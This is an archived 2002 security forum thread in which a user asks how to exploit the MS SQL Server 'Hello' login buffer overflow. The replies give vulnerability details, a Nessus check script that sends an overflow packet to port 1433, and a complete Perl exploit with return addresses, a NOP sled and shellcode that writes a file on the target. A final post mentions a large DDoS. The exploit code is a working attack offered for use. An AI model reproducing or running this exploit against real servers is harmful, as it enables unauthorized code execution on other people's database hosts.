MS SQL Hello Overflow

Networking/Security Forums -> Exploits // System Weaknesses

Author: RichieRich PostPosted: Tue Dec 10, 2002 7:16 am    Post subject: MS SQL Hello Overflow
    ----
Does anyone know how to exploit the MS SQL Hello buffer overflow? Any Information would be greatly appreciated. Very Happy

Author: ShaolinTigerLocation: Kuala Lumpur, Malaysia PostPosted: Tue Dec 10, 2002 12:10 pm    Post subject:
    ----
Versions Affected:

Microsoft SQL Server 7.0
Microsoft Data Engine (MSDE) 1.0
Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Scope:

The first vulnerability concerns the possibility of overwriting memory by sending a specially crafted login request to the SQL Server (the so-called “Hello Bug”). This could result in the execution of arbitrary code. Entercept protects against code execution as a result of buffer overflows.

The second vulnerability is a buffer overflow condition in one of the Database Console Commands (DBCC) and exploitation could lead to arbitrary code execution. Entercept’s Database Edition prevents against exploitation of several buffer overflow conditions in the DBCCs by blocking access to these commands. In addition, Entercept Standard Edition’s buffer overflow protection prevents code execution as a result of buffer overflows.

The third vulnerability is found in the SQL Agent, which can receive and execute jobs submitted by a database user. The privileges that come with running jobs by the SQL Agent may be higher than those of the database user that submitted them. Entercept’s Database Edition blocks access to the job scheduling stored procedures and thus, prevents this elevation of privileges.

Nessus also has this one in it's database.

Code:
##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433);
 exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
       #uncomment this to see what normally happens
        #attack_string="MSSQLServer";
   #uncomment next line to actually test for overflow
   attack_string=crap(560);
        # this creates a variable called sql_packet
   sql_packet = pkt_hdr+attack_string+pkt_tail;
   send(socket:soc, data:sql_packet);

       r  = recv(socket:soc, length:4096);
       close(soc);
   #display ("Result:",r,"\n");
      if(!r)
       {
       # display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
       }
    }
}


And below is a simple exploit that writes a file to the target machine:

Code:
#!/usr/local/bin/perl

#-----------------------------------------------------------
#   Exploit will create file '\scan_sql2k_bo2.'
#
# SQL Server 2000 'Hello Bug' for Win2k(SP2)
#    by sk@scan-associates.net & spoonfork
#
# Bug found by
#   Dave Aitel
#   http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0
#
# http://www.scan-associates.net/
# greetz to:    scan clan, especially to tynon, pokleyzz, and wyse
#      Alphaque and L33tdawg.
#      and Dave Aitel for finding and not releasing the exploit :>
# original and most up-to-date of dis file can be found in
#   http://www.scan-associates.net/papers/sql2kx2.txt
#-----------------------------------------------------------
use Socket;


$connect_host = $ARGV[0];

if (!defined($connect_host)) {
   print "Usage: $0 <target>\n";
   exit 255;
}

$port = 1433;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

$bug =  "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b";
$bug .=  "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02";
$bug .=  "\x10\x00\x00\x00";
$bug2 =  "A" x 528;
$bug .=  $bug2;
$bug .=  "\x6b\xd0\xc0\x40";
$bug .=  "AAAA";
$bug .=  "\x83\x91\xe8\x77";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x0b\x03\x0f\x02";
$bug .=  "DDDD";
$bug .=  "\x50\x1e\xd0\x42";
$bug .=  "\x50\x1e\xd0\x42";
$bug3 =  "\x90" x 88;
$bug .=  $bug3;
$bug .=  "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73";
$bug .=  "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88";
$bug .=  "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2";
$bug .=  "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0";

$bug .=  "\x00\x24\x01\x00\x00";

print SOCKET $bug;

Author: chetLocation: Nottingham, UK PostPosted: Sat Jan 25, 2003 1:43 pm    Post subject:
    ----
They are going mad over in the states

Yep going mad in the states, huge Ddos attack

http://webhostingtalk.com/showthread.php?s=c8b022fd63798fcc6524175a8d4933e2&threadid=107128

And wow this is getting busy,



Networking/Security Forums -> Exploits // System Weaknesses


output generated using printer-friendly topic mod, All times are GMT + 2 Hours

Page 1 of 1

Powered by phpBB 2.0.x © 2001 phpBB Group